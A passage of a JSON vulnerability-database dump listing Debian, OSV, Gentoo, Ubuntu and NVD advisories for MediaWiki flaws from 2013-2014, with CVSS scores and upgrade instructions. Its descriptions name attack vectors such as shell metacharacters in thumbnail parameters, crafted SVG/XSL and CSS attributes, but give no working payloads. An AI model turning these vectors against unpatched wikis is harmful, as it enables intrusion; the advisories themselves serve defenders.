update issued as DSA 2891-1 caused regressions. This\nupdate fixes those problems. For reference the original advisory\ntext follows.\n\nSeveral vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project describers the followin\nissues:\n\nCVE-2013-2031\n\n Cross-site scripting attack via valid UTF-7 encoded sequences\n in a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568\n\n Kevin Israel (Wikipedia user PleaseStand) reported two ways\n to inject Javascript due to an incomplete blacklist in the\n CSS sanitizer function.\n\nCVE-2013-4572\n\n MediaWiki and the CentralNotice extension were incorrectly setting\n cache headers when a user was autocreated, causing the user's\n session cookies to be cached, and returned to other users.\n\nCVE-2013-6452\n\n Chris from RationalWiki reported that SVG files could be\n uploaded that include external stylesheets, which could lead to\n XSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453\n\n MediaWiki's SVG sanitization could be bypassed when the XML was\n considered invalid.\n\nCVE-2013-6454\n\n MediaWiki's CSS sanitization did not filter -o-link attributes,\n which could be used to execute JavaScript in Opera 12.\n\nCVE-2013-6472\n\n MediaWiki displayed some information about deleted pages in\n the log API, enhanced RecentChanges, and user watchlists.\n\nCVE-2014-1610\n\n A remote code execution vulnerability existed if file upload\n support for DjVu (natively handled) or PDF files (in\n combination with the PdfHandler extension) was enabled.\n Neither file type is enabled by default in MediaWiki.\n\nCVE-2014-2665\n\n Cross site request forgery in login form: an attacker could login\n a victim as the attacker.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.19.15+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u2\nof the mediawiki-extensions package.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.19.15+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions package.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2014-04-04T18:02:59", "type": "debian", "title": "[SECURITY] [DSA 2891-3] mediawiki regression update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2031", "CVE-2013-4567", "CVE-2013-4568", "CVE-2013-4572", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2665"], "modified": "2014-04-04T18:02:59", "id": "DEBIAN:DSA-2891-3:4C320", "href": "https://lists.debian.org/debian-security-announce/2014/msg00068.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-29T23:26:21", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3011-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nAugust 23, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki\nCVE ID : CVE-2014-5241 CVE-2014-5243\nDebian Bug : 752622 758510\n\nIt was discovered that MediaWiki, a website engine for collaborative\nwork, is vulnerable to JSONP injection in Flash (CVE-2014-5241) and\nclickjacking between OutputPage and ParserOutput (CVE-2014-5243). The\nvulnerabilities are addressed by upgrading MediaWiki to the new upstream\nversion 1.19.18, which includes additional changes.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1:1.19.18+dfsg-0+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2014-08-23T15:27:05", "type": "debian", "title": "[SECURITY] [DSA 3011-1] mediawiki security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5241", "CVE-2014-5243"], "modified": "2014-08-23T15:27:05", "id": "DEBIAN:DSA-3011-1:91EB7", "href": "https://lists.debian.org/debian-security-announce/2014/msg00196.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T23:04:32", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3011-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nAugust 23, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki\nCVE ID : CVE-2014-5241 CVE-2014-5243\nDebian Bug : 752622 758510\n\nIt was discovered that MediaWiki, a website engine for collaborative\nwork, is vulnerable to JSONP injection in Flash (CVE-2014-5241) and\nclickjacking between OutputPage and ParserOutput (CVE-2014-5243). The\nvulnerabilities are addressed by upgrading MediaWiki to the new upstream\nversion 1.19.18, which includes additional changes.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1:1.19.18+dfsg-0+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2014-08-23T15:27:05", "type": "debian", "title": "[SECURITY] [DSA 3011-1] mediawiki security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5241", "CVE-2014-5243"], "modified": "2014-08-23T15:27:05", "id": "DEBIAN:DSA-3011-1:FA8C2", "href": "https://lists.debian.org/debian-security-announce/2014/msg00196.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-08-10T07:09:19", "description": "\nIt was discovered that MediaWiki, a website engine for collaborative\nwork, is vulnerable to JSONP injection in Flash ([CVE-2014-5241](https://security-tracker.debian.org/tracker/CVE-2014-5241)) and\nclickjacking between OutputPage and ParserOutput ([CVE-2014-5243](https://security-tracker.debian.org/tracker/CVE-2014-5243)). The\nvulnerabilities are addressed by upgrading MediaWiki to the new upstream\nversion 1.19.18, which includes additional changes.\n\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1:1.19.18+dfsg-0+deb7u1.\n\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\n\nWe recommend that you upgrade your mediawiki packages.\n\n\n", "cvss3": {}, "published": "2014-08-23T00:00:00", "type": "osv", "title": "mediawiki - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5241", "CVE-2014-5243"], "modified": "2022-08-10T07:09:14", "id": "OSV:DSA-3011-1", "href": "https://osv.dev/vulnerability/DSA-3011-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:29:02", "description": "\nSeveral vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project identifies the following\nissues:\n\n\n* [CVE-2013-2031](https://security-tracker.debian.org/tracker/CVE-2013-2031)\nCross-site scripting attack via valid UTF-7 encoded sequences\n in a SVG file.\n* [CVE-2013-4567](https://security-tracker.debian.org/tracker/CVE-2013-4567)\n & [CVE-2013-4568](https://security-tracker.debian.org/tracker/CVE-2013-4568)\nKevin Israel (Wikipedia user PleaseStand) reported two ways\n to inject Javascript due to an incomplete blacklist in the\n CSS sanitizer function.\n* [CVE-2013-4572](https://security-tracker.debian.org/tracker/CVE-2013-4572)\nMediaWiki and the CentralNotice extension were incorrectly setting\n cache headers when a user was autocreated, causing the user's\n session cookies to be cached, and returned to other users.\n* [CVE-2013-6452](https://security-tracker.debian.org/tracker/CVE-2013-6452)\nChris from RationalWiki reported that SVG files could be\n uploaded that include external stylesheets, which could lead to\n XSS when an XSL was used to include JavaScript.\n* [CVE-2013-6453](https://security-tracker.debian.org/tracker/CVE-2013-6453)\nMediaWiki's SVG sanitization could be bypassed when the XML was\n considered invalid.\n* [CVE-2013-6454](https://security-tracker.debian.org/tracker/CVE-2013-6454)\nMediaWiki's CSS sanitization did not filter -o-link attributes,\n which could be used to execute JavaScript in Opera 12.\n* [CVE-2013-6472](https://security-tracker.debian.org/tracker/CVE-2013-6472)\nMediaWiki displayed some information about deleted pages in\n the log API, enhanced RecentChanges, and user watchlists.\n* [CVE-2014-1610](https://security-tracker.debian.org/tracker/CVE-2014-1610)\nA remote code execution vulnerability existed if file upload\n support for DjVu (natively handled) or PDF files (in\n combination with the PdfHandler extension) was enabled.\n Neither file type is enabled by default in MediaWiki.\n* [CVE-2014-2665](https://security-tracker.debian.org/tracker/CVE-2014-2665)\nCross site request forgery in login form: an attacker could login\n a victim as the attacker.\n\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1:1.19.14+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u1\nof the mediawiki-extensions package.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.19.14+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions package.\n\n\nWe recommend that you upgrade your mediawiki packages.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2014-03-30T00:00:00", "type": "osv", "title": "mediawiki - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2031", "CVE-2013-2032", "CVE-2013-4567", "CVE-2013-4568", "CVE-2013-4572", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2665"], "modified": "2022-07-21T05:48:13", "id": "OSV:DSA-2891-1", "href": "https://osv.dev/vulnerability/DSA-2891-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2022-01-17T19:07:10", "description": "### Background\n\nMediaWiki is a collaborative editing software used by large projects such as Wikipedia. \n\n### Description\n\nMultiple vulnerabilities have been discovered in MediaWiki. Please review the CVE identifiers and MediaWiki announcement referenced below for details. \n\n### Impact\n\nA remote attacker may be able to execute arbitrary code with the privileges of the process, create a Denial of Service condition, obtain sensitive information, bypass security restrictions, and inject arbitrary web script or HTML. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll MediaWiki 1.23 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/mediawiki-1.23.8\"\n \n\nAll MediaWiki 1.22 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/mediawiki-1.22.15\"\n \n\nAll MediaWiki 1.19 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/mediawiki-1.19.23\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-02-07T00:00:00", "type": "gentoo", "title": "MediaWiki: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2242", "CVE-2014-2243", "CVE-2014-2244", "CVE-2014-2665", "CVE-2014-2853", "CVE-2014-5241", "CVE-2014-5242", "CVE-2014-5243", "CVE-2014-7199", "CVE-2014-7295", "CVE-2014-9276", "CVE-2014-9277", "CVE-2014-9475", "CVE-2014-9476", "CVE-2014-9477", "CVE-2014-9478", "CVE-2014-9479", "CVE-2014-9480", "CVE-2014-9481", "CVE-2014-9487", "CVE-2014-9507"], "modified": "2015-02-07T00:00:00", "id": "GLSA-201502-04", "href": "https://security.gentoo.org/glsa/201502-04", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:19:57", "description": "Cross-site scripting (XSS) vulnerability in\nmediawiki.page.image.pagination.js in MediaWiki 1.22.x before 1.22.9 and\n1.23.x before 1.23.2 allows remote attackers to inject arbitrary web script\nor HTML via vectors involving the multipageimagenavbox class in conjunction\nwith an action=raw value.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | Introduced in 1.22, thus none of our packages are affected\n", "cvss3": {}, "published": "2014-08-22T00:00:00", "type": "ubuntucve", "title": "CVE-2014-5242", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5242"], "modified": "2014-08-22T00:00:00", "id": "UB:CVE-2014-5242", "href": "https://ubuntu.com/security/CVE-2014-5242", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:32:21", "description": "The JSONP endpoint in includes/api/ApiFormatJson.php in MediaWiki before\n1.19.18, 1.20.x through 1.22.x before 1.22.9, and 1.23.x before 1.23.2\naccepts certain long callback values and does not restrict the initial\nbytes of a JSONP response, which allows remote attackers to conduct\ncross-site request forgery (CSRF) attacks, and obtain sensitive\ninformation, via a crafted OBJECT element with SWF content consistent with\na restricted character set.", "cvss3": {}, "published": "2014-08-22T00:00:00", "type": "ubuntucve", "title": "CVE-2014-5241", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5241"], "modified": "2014-08-22T00:00:00", "id": "UB:CVE-2014-5241", "href": "https://ubuntu.com/security/CVE-2014-5241", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:21:05", "description": "MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 does\nnot properly sanitize SVG files, which allows remote attackers to have\nunspecified impact via invalid XML.", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "ubuntucve", "title": "CVE-2013-6453", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6453"], "modified": "2014-05-12T00:00:00", "id": "UB:CVE-2013-6453", "href": "https://ubuntu.com/security/CVE-2013-6453", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:21:05", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, 1.2x\nbefore 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject\narbitrary web script or HTML via crafted XSL in an SVG file.", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "ubuntucve", "title": "CVE-2013-6452", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6452"], "modified": "2014-05-12T00:00:00", "id": "UB:CVE-2013-6452", "href": "https://ubuntu.com/security/CVE-2013-6452", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:21:06", "description": "MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1\nallows remote attackers to obtain information about deleted page via the\n(1) log API, (2) enhanced RecentChanges, and (3) user watchlists.", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "ubuntucve", "title": "CVE-2013-6472", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6472"], "modified": "2014-05-12T00:00:00", "id": "UB:CVE-2013-6472", "href": "https://ubuntu.com/security/CVE-2013-6472", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:19:56", "description": "MediaWiki before 1.19.18, 1.20.x through 1.22.x before 1.22.9, and 1.23.x\nbefore 1.23.2 does not enforce an IFRAME protection mechanism for\ntranscluded pages, which makes it easier for remote attackers to conduct\nclickjacking attacks via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | bug not visible on 2014-08-14\n", "cvss3": {}, "published": "2014-08-22T00:00:00", "type": "ubuntucve", "title": "CVE-2014-5243", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5243"], "modified": "2014-08-22T00:00:00", "id": "UB:CVE-2014-5243", "href": "https://ubuntu.com/security/CVE-2014-5243", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T13:32:04", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki 1.19.9 before\n1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote\nattackers to inject arbitrary web script or HTML via unspecified CSS\nvalues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-01-28T00:00:00", "type": "ubuntucve", "title": "CVE-2013-6451", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451"], "modified": "2020-01-28T00:00:00", "id": "UB:CVE-2013-6451", "href": "https://ubuntu.com/security/CVE-2013-6451", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:22:31", "description": "MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5, and 1.19.x before\n1.19.11, when DjVu or PDF file upload support is enabled, allows remote\nattackers to execute arbitrary commands via shell metacharacters in (1) the\npage parameter to includes/media/DjVu.php; (2) the w parameter (aka width\nfield) to thumb.php, which is not properly handled by\nincludes/media/PdfHandler_body.php; and possibly unspecified vectors in (3)\nincludes/media/Bitmap.php and (4) includes/media/ImageHandler.php.", "cvss3": {}, "published": "2014-01-30T00:00:00", "type": "ubuntucve", "title": "CVE-2014-1610", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1610"], "modified": "2014-01-30T00:00:00", "id": "UB:CVE-2014-1610", "href": "https://ubuntu.com/security/CVE-2014-1610", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:21:12", "description": "Cross-site scripting (XSS) vulnerability in includes/actions/InfoAction.php\nin MediaWiki before 1.21.9 and 1.22.x before 1.22.6 allows remote attackers\nto inject arbitrary web script or HTML via the sort key in an info action.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[ebarretto](<https://launchpad.net/~ebarretto>) | On 1.19 action=info is disabled by default.\n", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "ubuntucve", "title": "CVE-2014-2853", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2853"], "modified": "2014-04-29T00:00:00", "id": "UB:CVE-2014-2853", "href": "https://ubuntu.com/security/CVE-2014-2853", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:21:05", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, 1.2x\nbefore 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject\narbitrary web script or HTML via a -o-link attribute.", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "ubuntucve", "title": "CVE-2013-6454", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6454"], "modified": "2014-05-12T00:00:00", "id": "UB:CVE-2013-6454", "href": "https://ubuntu.com/security/CVE-2013-6454", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T13:38:57", "description": "Cross-site scripting (XSS) vulnerability in mediawiki.page.image.pagination.js in MediaWiki 1.22.x before 1.22.9 and 1.23.x before 1.23.2 allows remote attackers to inject arbitrary web script or HTML via vectors involving the multipageimagenavbox class in conjunction with an action=raw value.", "cvss3": {}, "published": "2014-08-22T17:55:00", "type": "cve", "title": "CVE-2014-5242", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5242"], "modified": "2015-09-08T17:55:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.22.6", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.22.5", "cpe:/a:mediawiki:mediawiki:1.22.8", "cpe:/a:mediawiki:mediawiki:1.23.1", 